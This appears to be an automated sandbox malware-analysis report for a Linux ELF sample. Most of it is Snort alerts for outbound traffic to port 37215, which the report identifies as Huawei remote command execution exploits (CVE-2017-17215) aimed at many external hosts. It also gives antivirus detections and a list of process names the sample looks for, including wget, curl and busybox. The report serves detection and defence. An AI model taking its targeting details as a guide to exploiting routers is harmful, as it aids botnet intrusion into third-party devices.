                  SID:2835222
                  Source Port:56516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651187
                  SID:2835222
                  Source Port:55870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860060
                  SID:2835222
                  Source Port:49166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529648
                  SID:2829579
                  Source Port:58340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793508
                  SID:2835222
                  Source Port:46446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489339
                  SID:2835222
                  Source Port:50080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766522
                  SID:2835222
                  Source Port:40044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587896
                  SID:2829579
                  Source Port:59462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910248
                  SID:2829579
                  Source Port:32854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488634
                  SID:2835222
                  Source Port:53802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312641
                  SID:2829579
                  Source Port:37934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910209
                  SID:2835222
                  Source Port:37556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551828
                  SID:2835222
                  Source Port:34808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809977
                  SID:2829579
                  Source Port:46780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629095
                  SID:2835222
                  Source Port:54540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738112
                  SID:2835222
                  Source Port:52960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316227
                  SID:2829579
                  Source Port:48374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590327
                  SID:2829579
                  Source Port:59598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453482
                  SID:2835222
                  Source Port:43836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695696
                  SID:2835222
                  Source Port:56374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.588028
                  SID:2829579
                  Source Port:53208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483027
                  SID:2835222
                  Source Port:60128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584142
                  SID:2829579
                  Source Port:39768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887115
                  SID:2835222
                  Source Port:57548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780563
                  SID:2835222
                  Source Port:52014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577810
                  SID:2835222
                  Source Port:52362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927378
                  SID:2829579
                  Source Port:50942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845733
                  SID:2829579
                  Source Port:35530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593103
                  SID:2829579
                  Source Port:55310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790325
                  SID:2829579
                  Source Port:47096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660948
                  SID:2835222
                  Source Port:37802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591031
                  SID:2829579
                  Source Port:36674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931604
                  SID:2835222
                  Source Port:40404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791738
                  SID:2835222
                  Source Port:41798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881229
                  SID:2835222
                  Source Port:41622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770870
                  SID:2829579
                  Source Port:36934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.878363
                  SID:2835222
                  Source Port:45304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719526
                  SID:2835222
                  Source Port:51968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494420
                  SID:2829579
                  Source Port:41444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766209
                  SID:2835222
                  Source Port:48500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719717
                  SID:2829579
                  Source Port:47628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278727
                  SID:2829579
                  Source Port:37242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661291
                  SID:2835222
                  Source Port:38236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696122
                  SID:2835222
                  Source Port:43208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545395
                  SID:2835222
                  Source Port:54494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695760
                  SID:2835222
                  Source Port:52700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797140
                  SID:2835222
                  Source Port:52972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661676
                  SID:2835222
                  Source Port:58374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651447
                  SID:2829579
                  Source Port:38818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821112
                  SID:2835222
                  Source Port:43646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742341
                  SID:2829579
                  Source Port:36182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316527
                  SID:2829579
                  Source Port:56444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652043
                  SID:2835222
                  Source Port:47122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661344
                  SID:2835222
                  Source Port:33874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694877
                  SID:2829579
                  Source Port:60492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528268
                  SID:2835222
                  Source Port:44880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628950
                  SID:2829579
                  Source Port:36576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493184
                  SID:2829579
                  Source Port:38992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649378
                  SID:2829579
                  Source Port:42790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695152
                  SID:2829579
                  Source Port:47286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911531
                  SID:2835222
                  Source Port:52964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790305
                  SID:2829579
                  Source Port:37726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278130
                  SID:2829579
                  Source Port:60488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536559
                  SID:2829579
                  Source Port:51986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843860
                  SID:2835222
                  Source Port:47828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.584840
                  SID:2829579
                  Source Port:46876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942528
                  SID:2835222
                  Source Port:38088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719496
                  SID:2829579
                  Source Port:49868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487865
                  SID:2835222
                  Source Port:34496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766269
                  SID:2835222
                  Source Port:58442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530023
                  SID:2835222
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.932207
                  SID:2835222
                  Source Port:57308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810003
                  SID:2829579
                  Source Port:38292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780933
                  SID:2835222
                  Source Port:50570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766515
                  SID:2829579
                  Source Port:40546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277376
                  SID:2829579
                  Source Port:53328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799412
                  SID:2829579
                  Source Port:51462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279087
                  SID:2835222
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912178
                  SID:2829579
                  Source Port:59352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845824
                  SID:2829579
                  Source Port:53078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803718
                  SID:2829579
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817724
                  SID:2835222
                  Source Port:42488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536245
                  SID:2829579
                  Source Port:39360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483047
                  SID:2829579
                  Source Port:33070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927107
                  SID:2829579
                  Source Port:47608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719087
                  SID:2835222
                  Source Port:53662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793322
                  SID:2835222
                  Source Port:42426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576145
                  SID:2829579
                  Source Port:60234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577129
                  SID:2829579
                  Source Port:58810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278695
                  SID:2829579
                  Source Port:51554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866527
                  SID:2829579
                  Source Port:34386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628964
                  SID:2835222
                  Source Port:35014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737602
                  SID:2835222
                  Source Port:38220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529953
                  SID:2835222
                  Source Port:36456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885968
                  SID:2829579
                  Source Port:34890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930080
                  SID:2829579
                  Source Port:49650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916796
                  SID:2835222
                  Source Port:34642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745949
                  SID:2829579
                  Source Port:51154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585438
                  SID:2829579
                  Source Port:48830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489468
                  SID:2829579
                  Source Port:54884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661996
                  SID:2829579
                  Source Port:42256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657631
                  SID:2829579
                  Source Port:57160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787926
                  SID:2829579
                  Source Port:49630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587950
                  SID:2835222
                  Source Port:40922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628153
                  SID:2835222
                  Source Port:52564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794612
                  SID:2829579
                  Source Port:35036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300882
                  SID:2829579
                  Source Port:49762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510751
                  SID:2835222
                  Source Port:34262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595302
                  SID:2835222
                  Source Port:57194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.683195
                  SID:2829579
                  Source Port:46912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279334
                  SID:2835222
                  Source Port:48424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493595
                  SID:2829579
                  Source Port:43948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659554
                  SID:2835222
                  Source Port:47306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495944
                  SID:2829579
                  Source Port:46082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907258
                  SID:2829579
                  Source Port:42388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791736
                  SID:2829579
                  Source Port:40316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529062
                  SID:2835222
                  Source Port:34406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577774
                  SID:2835222
                  Source Port:44994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555507
                  SID:2829579
                  Source Port:48438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796821
                  SID:2835222
                  Source Port:57662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488826
                  SID:2829579
                  Source Port:38398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517612
                  SID:2829579
                  Source Port:41050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678621
                  SID:2829579
                  Source Port:40296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931662
                  SID:2835222
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.669618
                  SID:2829579
                  Source Port:56080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563574
                  SID:2835222
                  Source Port:45804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768715
                  SID:2829579
                  Source Port:33852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927243
                  SID:2835222
                  Source Port:43640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737602
                  SID:2829579
                  Source Port:43812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799399
                  SID:2829579
                  Source Port:48106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537212
                  SID:2829579
                  Source Port:43990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695118
                  SID:2829579
                  Source Port:35118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910511
                  SID:2835222
                  Source Port:50724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651729
                  SID:2835222
                  Source Port:51962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.608653
                  SID:2829579
                  Source Port:41900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578036
                  SID:2835222
                  Source Port:33512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315646
                  SID:2835222
                  Source Port:41584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576433
                  SID:2829579
                  Source Port:33406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682925
                  SID:2829579
                  Source Port:42800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489438
                  SID:2829579
                  Source Port:43030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788846
                  SID:2829579
                  Source Port:37508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795404
                  SID:2835222
                  Source Port:59706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491154
                  SID:2835222
                  Source Port:55734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578622
                  SID:2829579
                  Source Port:53542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628950
                  SID:2835222
                  Source Port:58038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536620
                  SID:2829579
                  Source Port:50314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926645
                  SID:2829579
                  Source Port:47760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.801597
                  SID:2835222
                  Source Port:49340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.912649
                  SID:2835222
                  Source Port:40270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300170
                  SID:2835222
                  Source Port:38324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920416
                  SID:2829579
                  Source Port:42170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537215
                  SID:2829579
                  Source Port:53652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583189
                  SID:2835222
                  Source Port:45418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910506
                  SID:2829579
                  Source Port:59008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592903
                  SID:2829579
                  Source Port:60626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920130
                  SID:2835222
                  Source Port:40200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650345
                  SID:2835222
                  Source Port:37502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910965
                  SID:2835222
                  Source Port:37884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495960
                  SID:2835222
                  Source Port:33868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590454
                  SID:2835222
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695722
                  SID:2835222
                  Source Port:55564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587422
                  SID:2829579
                  Source Port:60320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659642
                  SID:2835222
                  Source Port:57760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907222
                  SID:2835222
                  Source Port:48822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277846
                  SID:2835222
                  Source Port:58358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550699
                  SID:2835222
                  Source Port:39910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629666
                  SID:2829579
                  Source Port:60090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312367
                  SID:2829579
                  Source Port:51900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847591
                  SID:2835222
                  Source Port:54766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496261
                  SID:2835222
                  Source Port:56672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.609863
                  SID:2835222
                  Source Port:39458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844991
                  SID:2829579
                  Source Port:50448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859926
                  SID:2835222
                  Source Port:34962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: KlgUGKamBf.elfAvira: detected
                  Source: KlgUGKamBf.elfReversingLabs: Detection: 52%
                  Source: KlgUGKamBf.elfJoe Sandbox ML: detected
                  Source: KlgUGKamBf.elfString: /proc/proc/%d/cmdlinewgetcurl/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39404 -> 157.174.221.211:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39404 -> 157.174.221.211:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41908 -> 197.211.102.37:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41908 -> 197.211.102.37:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47344 -> 157.97.154.202:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47344 -> 157.97.154.202:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38034 -> 157.250.209.211:37215
